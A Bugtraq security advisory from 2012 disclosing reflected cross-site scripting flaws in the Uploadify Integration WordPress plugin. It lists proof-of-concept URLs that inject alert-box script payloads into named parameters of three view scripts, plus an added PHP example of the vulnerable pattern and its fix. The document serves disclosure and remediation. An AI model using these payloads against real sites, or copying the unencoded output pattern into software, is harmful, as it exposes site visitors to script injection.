Message-Id: <201204061402.q36E2oio000450@sf01web3.securityfocus.com>
Date: Fri, 6 Apr 2012 14:02:50 GMT
From: come2waraxe@...oo.com
To: bugtraq@...urityfocus.com
Subject: [waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
===============================================================================
Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-85.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Uploadify Integration allows you to insert a jQuery uploadify uploader into your
forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user
meta, an option, or temporary depending on the metaType selected by the shortcode.
Allows more than one shortcode per page.
http://wordpress.org/extend/plugins/uploadify-integration/
Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected is Uploadify Integration 0.9.6; older versions may be affected as well.
###############################################################################
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"
###############################################################################
Reason: user-controlled values are output into HTML without proper encoding
Attack vector: user-submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>
Result: XSS payload execution can be observed
###############################################################################
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"
###############################################################################
Reason: user-controlled values are output into HTML without proper encoding
Attack vector: user-submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
Result: XSS payload execution can be observed
###############################################################################
3. Reflected XSS vulnerability in "views/scripts/file/error.php"
###############################################################################
Reason: user-controlled values are output into HTML without proper encoding
Attack vector: user-submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities
Tests:
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>
Result: XSS payload execution can be observed
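The three findings above share one root cause: a view script echoes template variables (inputname, fileid, error, ...) into HTML, and with register_globals=On a direct request to the script lets those variables come straight from the query string. The following is an added illustration, not the plugin's code; the function names and markup are assumptions, and the payload is the advisory's own test string. It shows the assumed vulnerable shape next to a hardened version that takes its values from an explicit array, encodes for the attribute context, and refuses direct requests.

```php
<?php
// Added example (not from the Uploadify Integration plugin). Reconstructs the
// pattern the advisory describes; function names and markup are assumptions.

// --- Vulnerable shape: template variables are echoed raw into attributes. ---
// With register_globals=On, an undefined $inputname is filled from GET/POST when
// the view script is requested directly, so "> closes the attribute and the tag.
function render_input_vulnerable($inputname, $buttontext) {
    return '<input type="file" name="' . $inputname . '" title="' . $buttontext . '">';
}

// --- Hardened version ---
// Encode for the HTML attribute context. In WordPress use esc_attr(); outside it,
// htmlspecialchars() with ENT_QUOTES escapes both " and ' as well as < and >.
function attr_encode($value) {
    if (function_exists('esc_attr')) {
        return esc_attr($value);
    }
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Take values only from an explicit array supplied by the shortcode handler,
// with a default for every key, so no variable can come from register_globals.
function render_input_hardened(array $atts) {
    $atts = array_merge(
        array('inputname' => 'file', 'buttontext' => 'Select file'),
        $atts
    );
    return '<input type="file" name="' . attr_encode($atts['inputname'])
         . '" title="' . attr_encode($atts['buttontext']) . '">';
}

// Each view script should also refuse standalone requests. The guard below
// belongs at the top of the view file (kept as a comment so this demo runs):
//   if (!defined('ABSPATH')) { http_response_code(403); exit; }

// Constructed sample input: the advisory's test payload.
$payload = '"><script>alert(String.fromCharCode(88,83,83))</script>';
echo render_input_vulnerable($payload, 'Upload'), "\n";
// name="" is closed early and the script tag is emitted as markup.
echo render_input_hardened(array('inputname' => $payload)), "\n";
// name="&quot;&gt;&lt;script&gt;...": the payload stays inert text.
```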
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@...oo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------